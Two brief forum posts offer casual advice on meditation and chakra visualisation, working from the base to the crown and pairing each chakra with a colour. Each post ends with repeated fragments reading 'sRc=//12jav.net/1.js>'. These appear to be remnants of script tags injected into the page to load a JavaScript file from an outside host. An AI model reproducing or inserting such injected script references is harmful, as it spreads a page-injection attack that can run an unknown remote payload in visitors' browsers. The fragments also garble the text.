Well, start with meditation then work your way to chakra work, starting from the crown (head) down or the base (your tushie) up. :) sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

when i work with my chakras, before i do anything, i meditate and use visualization to unfold my charkras one at a time, starting from the base to the crown, associating each one with its color... theres all different methods to learn, you just gotta search for whats best for you. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
